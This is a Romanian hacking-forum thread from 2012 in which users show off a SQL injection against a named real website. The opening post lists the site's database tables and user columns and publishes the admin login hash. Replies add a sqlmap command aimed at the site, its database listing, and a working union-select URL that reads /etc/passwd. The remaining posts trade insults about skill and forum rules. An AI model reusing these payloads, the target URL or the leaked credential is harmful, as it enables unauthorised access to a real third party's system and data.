.Slacker Posted September 23, 2012 Report Posted September 23, 2012 [+]Target:www.mida.ro[+]Author: .Slacker[+]Host IP: 46.51.108.12[+]Version: 5.1.47[+]Injection-Type: Union Based[+]Current DB: mida[+]Tables:CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,adm,anexe,arhiva,articol,categorii,categorii_arhiva,categorii_stiri,contact,flash,linkuri,pagini,parteneri,subcategorii,users,7wx4rt5_aicontactsafe_config,7wx4rt5_aicontactsafe_contactinformations,7wx4rt5_aicontactsafe_fields,7wx4rt5_aicontactsafe_fieldvalues,7wx4rt5_aicontactsafe_messagefiles,7wx4rt5_aicontactsafe_messages,7wx4rt5_aicontactsafe_profiles,7wx4rt5_aicontactsafe_statuses,7wx4rt5_banner,7wx4rt5_bannerclient,7wx4rt5_ban[+]Columns for users:id,user,parola,nume,prenume,adresa,localitate,telefon,email,data,id,nev,knev,unev,password,megye,telepules,cim,ci,aktiv,email,id,externid,objectclass,signature,companySite-ul este plin de vulnerabilitati, deci imi voi permite sa fac publice datele de logare:+-------------------------------------------------+| Name: Password: || Admin 80f8e70b29c5966a919c38e0ca57c571 |+-------------------------------------------------+ Quote
EOF Posted September 24, 2012 Report Posted September 24, 2012 Super!Postezi si sintaxa? Merci! Quote
J Posted September 24, 2012 Report Posted September 24, 2012 "Site-ul este plin de vulnerabilitati, deci imivoi permite sa fac publice datele de logare"Ce criteriu stupid . Quote
aelius Posted September 24, 2012 Report Posted September 24, 2012 (edited) Super!Postezi si sintaxa? Merci!Ce sintaxa vrei frate, nu te uiti ce scrie la el la location ? Toata treaba aia a durat doua secunde. Ce ca**t de hacking e asta ? A luat un link si a dat cu sqlmap pe elhp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 23:48:13...............web server operating system: Linux Fedoraweb application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5[23:48:14] [INFO] fetching database namesavailable databases [23]:[*] ambalaj_ccihr[*] costides_cartuse[*] costides_corvina[*] costides_dekoratex[*] costides_sazy[*] costides_transilva[*] csalad[*] csikisport[*] hardwarecenter_hc[*] hardwarecenter_szamla[*] information_schema[*] markbi[*] mida[*] munkacsy[*] mysql[*] parfum[*] parfumworld[*] salvator[*] syrinx[*] test[*] twinart[*] vkv[*] zarafagata frate, am dat o comanda si sunt hacker, o sa fiu in imparatia cerului, ia sa-l pun inca odata pe show off pe RST, poate o sa capat respectul baietilor, ca sunt bazat Edited September 24, 2012 by aelius Quote
fallen_angel Posted September 24, 2012 Report Posted September 24, 2012 Tex, teach me ! Ce face --union-use ? C? ?i io folosesc sqlmap, dar se pare c?-s n00b Quote
blackboy-1337- Posted September 24, 2012 Report Posted September 24, 2012 Ce, cacat e asa greu sa-l faci manual ? E un sqli basic. Quote
aelius Posted September 24, 2012 Report Posted September 24, 2012 ;391688']Ce' date=' cacat e asa greu sa-l faci manual ? E un sqli basic.[/quote']Pai ala nu stie nicio comanda mysql bre. Baga link-ul, da cu click-ul si gata Quote
Parker Posted September 24, 2012 Report Posted September 24, 2012 Pana sa intru in link am crezut ca e vorba de un site serios. Dar inainte sa intru pe site m-am uitat la utilizator si mi-am dat seama ca nu poate fi un site serios! Quote
Wubi Posted September 24, 2012 Report Posted September 24, 2012 http://www.mida.ro/content.php?id=-11+UNION+SELECT+1,2,LOAD_FILE(0x2f6574632f706173737764),4 Quote
EOF Posted September 24, 2012 Report Posted September 24, 2012 Va multumesc foarte mult. Toate cele bune! Quote
abraxyss Posted September 25, 2012 Report Posted September 25, 2012 ----------------+| Name: Password: || Admin 80f8e70b29c5966a919c38e0ca57c571 |+-------------------------------------------------+ups , sry , m-a mancat update-ul Quote
.Slacker Posted September 25, 2012 Author Report Posted September 25, 2012 Bre nene, location-ul meu este pus asa de ochii lumii. Nu am folosit sqlmap sau vreun soft! Totul a fost facut manual @tex si cum ai ajuns tu la concluzia ca nu stiu nici o comanda mysql? Quote
Guest Kovalski Posted September 25, 2012 Report Posted September 25, 2012 Ba, eu am ceva de zis, nu stiu daca voi v-ati saturat sau nu de showoff-uri cu sql"i" dar eu personal m-am scarbit sa vad :"lumea-copiilor.ro SQLI" WTF?!? cand vii cu un sqli (manual) in ceva ce sa merite atentia si timpul nostru de a citi cacatu ala de topic, atunci se poate numi showoff.Momentan, ceea ce se posteaza pe la showoff sunt numai rable de siteuri cu admini mutalai care joaca Metin 8.Asa ca eu propun ca, cine mai face post la showoff cu rable de siteuri primeste ban 1 saptamana.Cine face sqli la un site mai de "Doamne, ajuta" si nu posteaza si sintaxa primeste ban 1 saptamana.In categoria siteuri de "Doamne ajuta" nu intra "moloz.tk, lumea-copiilor.ro, gradinita-sector2.ro suruburi.si.piulite.net etc,etc.Cine e de parere cu mos ps sa urle aici.ps. intr-e timp... trash. Quote